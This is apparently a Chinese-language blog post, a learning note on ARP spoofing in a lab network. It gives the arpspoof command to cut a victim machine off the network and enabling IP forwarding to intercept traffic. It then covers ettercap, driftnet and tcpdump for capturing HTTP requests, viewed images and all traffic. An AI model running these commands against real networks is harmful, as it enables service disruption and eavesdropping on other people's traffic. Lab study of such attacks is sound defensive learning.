内网学习六-Arp攻击

进行arp欺骗,算是内网中的一种手段吧,但是个人觉得有点鸡肋。。

攻击者:192.168.70.129

受害者:192.168.70.146

Arp攻击

可以造成暂时断网,interesting,但是前提要保证关闭IP转发

1
cat /proc/sys/net/ipv4/ip_forward
1
arpspoof -i(网卡) -t(目标IP) (目标网关)

lAQWPx.png

受害者此时就会断网

lAlCZj.png

同样可以看得见arp缓存里面的MAC地址全都变成kali这台机子的MAC地址了

lAltyD.png

若开启ip转发的话,就相当于中间人去监听一系列信息了

1
echo 1 > /proc/sys/net/ipv4/ip_forward

可以做下面的事情

ettercap -Tq -i eth0,截取一些http请求的一些流量

lA8gOO.png

被害者访问某些页面使用driftnet截获受害者浏览的图片,使用命令

1
driftnet -i (网卡)

lA3tVH.png

使用tcpdump或Wireshark工具截获所有流量

lAYDYj.png

Ettercap

喜欢用图形化界面的可以使用这个工具,比较方便,注意虚拟机的话好像必须要在桥接模式下执行

可以参考一下这位大佬的文章:

https://www.cnblogs.com/hkleak/p/5043063.html


听说,打赏我的人最后都成了大佬。



文章目录
  1. 1. Arp攻击
  2. 2. Ettercap